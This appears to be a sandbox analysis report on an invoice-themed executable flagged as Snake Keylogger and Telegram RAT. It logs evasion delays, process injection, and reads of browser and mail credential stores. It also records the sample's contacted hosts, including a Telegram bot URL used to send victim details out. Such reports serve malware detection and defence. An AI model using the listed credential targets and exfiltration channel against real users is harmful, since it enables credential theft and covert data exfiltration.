Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -599722s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 4136 Thread sleep count: 8085 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -599578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -599469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -599344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -599235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -599110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -598985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -598860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -598735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -598610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -598485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -598359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -598250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -598141s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -598032s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -597907s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -597782s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -597669s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -597562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -597263s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -597153s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -597047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -596938s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -596828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -596719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -596610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -596485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -596360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -596235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -596110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -595985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -595860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -595735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -595610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -595485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -595360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -595235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -595110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -594985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -594860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -594735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -594610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -594485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -594360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -594235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -594110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -593985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -593860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -593735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004055FF
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_004060BA FindFirstFileW,FindClose, 0_2_004060BA
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_00402770 FindFirstFileW, 0_2_00402770
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_00402770 FindFirstFileW, 4_2_00402770
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_004055FF
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_004060BA FindFirstFileW,FindClose, 4_2_004060BA
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599722 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599578 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599469 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599344 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599235 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599110 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598985 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598860 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598735 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598610 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598485 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598359 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598250 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598141 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598032 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597907 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597782 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597669 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597562 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597263 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597153 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597047 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596938 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596828 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596719 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596610 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596485 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596360 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596235 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596110 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595985 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595860 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595735 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595610 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595485 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595360 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595235 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595110 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594985 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594860 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594735 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594610 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594485 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594360 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594235 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594110 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 593985 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 593860 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 593735 Jump to behavior
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.2991384453.00000000074F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.2991384453.0000000007498000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe API call chain: ExitProcess graph end node
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_00403741 GetTempPathW,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,LdrInitializeThunk,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,ShowWindow,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetClassInfoW,GetClassInfoW,GetClassInfoW,RegisterClassW,DialogBoxParamW,LdrInitializeThunk,LdrInitializeThunk, 0_2_00403741
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_004060E1 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004060E1
Enables debug privileges
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process created: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe "C:\Users\user\Desktop\Factura Honorarios 2024-10.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Queries volume information: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_00405D99 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00405D99
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000004.00000002.3011994404.00000000379A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: Factura Honorarios 2024-10.exe PID: 5852, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000004.00000002.3011994404.0000000037AA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Factura Honorarios 2024-10.exe PID: 5852, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000004.00000002.3011994404.00000000379A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: Factura Honorarios 2024-10.exe PID: 5852, type: MEMORYSTR
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
132.226.8.169
 checkip.dyndns.com United States
16989 UTMEMUS false
142.250.185.193
 drive.usercontent.google.com United States
15169 GOOGLEUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
188.114.97.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
216.58.206.46
 drive.google.com United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
drive.google.com 216.58.206.46 true
drive.usercontent.google.com 142.250.185.193 true
reallyfreegeoip.org 188.114.97.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 132.226.8.169 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://reallyfreegeoip.org/xml/173.254.250.78 false
    		unknown
    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20and%20Time:%2031/10/2024%20/%2001:29:36%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20928100%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
      		unknown
      http://checkip.dyndns.org/ false
      • URL Reputation: safe
      		 unknown